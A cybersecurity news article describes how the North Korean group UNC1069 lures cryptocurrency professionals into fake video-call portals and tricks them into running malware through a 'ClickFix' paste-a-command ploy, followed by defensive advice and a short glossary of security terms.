Crypto Pros Lured Into North Korean Cyber Traps: Fake Meetings, Real Heists

It began with what seemed like a golden opportunity - a venture capital firm reaching out for a meeting, a due diligence call, or a partnership discussion. But beneath the polished surface of Zoom and Google Meet links, a relentless North Korean cyber operation was in play, targeting the very heart of the digital asset world. The group known as UNC1069 has woven an intricate web of deception, using fake meetings and sophisticated malware to siphon millions from unsuspecting cryptocurrency professionals worldwide.

The operation is as audacious as it is sophisticated. Posing as high-profile investors on platforms like LinkedIn and Telegram, UNC1069 initiates conversations that evolve seamlessly into scheduled “business calls.” Using tools like Calendly and even hijacked legitimate accounts, the attackers build trust before springing their trap - a link to a meeting portal that perfectly mimics Zoom, Google Meet, or Microsoft Teams.

Once inside these portals, the attack kicks into high gear. Victims are told of technical issues - missing updates, audio glitches, or required SDKs - and pressured to paste commands into their system’s terminal or PowerShell window, a tactic known as “ClickFix.” On Windows, this results in a cascade of obfuscated scripts: malware disables security tools, steals browser data, and establishes long-term control. On macOS and Linux, similar techniques deploy RATs (remote access trojans) that bypass built-in protections, all while masquerading as legitimate software updates.

But the deception doesn’t end with malware. UNC1069’s fake portals double as surveillance hubs, quietly capturing microphone and camera feeds using standard browser APIs. This stolen footage can be recycled into future social engineering ploys, or even deepfakes - making the next round of attacks even harder to spot.

The infrastructure behind these scams is sprawling. Dozens of attacker-controlled domains mimic both meeting platforms and investment firms, while technical fingerprints link the campaign to notorious North Korean operations like Bluenoroff and CryptoCore. Google and other security researchers have traced the group’s activities to high-profile supply-chain attacks, including developer-targeted malware hidden in popular npm packages.

For the crypto and Web3 sector, the message is clear: unsolicited investment approaches and “urgent” calls - even from familiar names - should trigger maximum caution. Experts recommend strict verification of counterparties, prohibiting employees from executing commands during calls, and closely monitoring for suspicious system activity during collaboration sessions.

As UNC1069 evolves, blending technical prowess with social engineering, the threat to the digital finance ecosystem grows ever more sophisticated. In a world where a single click can open the door to millions in losses, vigilance and skepticism are the new currencies of survival.

WIKICROOK

• Social Engineering: Social engineering is the use of deception by hackers to trick people into revealing confidential information or providing unauthorized system access.
• RAT (Remote Access Trojan): A RAT (Remote Access Trojan) is malware that lets attackers secretly control a victim’s device remotely, accessing files and system functions.
• Obfuscated Script: An obfuscated script is code that’s deliberately scrambled or layered to make it hard for people and security tools to interpret or detect.
• Deepfake: A deepfake is AI-generated media that imitates real people’s appearance or voice, often used to deceive by creating convincing fake videos or audio.
• Persistence: Persistence involves techniques used by malware to survive reboots and stay hidden on systems, often by mimicking legitimate processes or updates.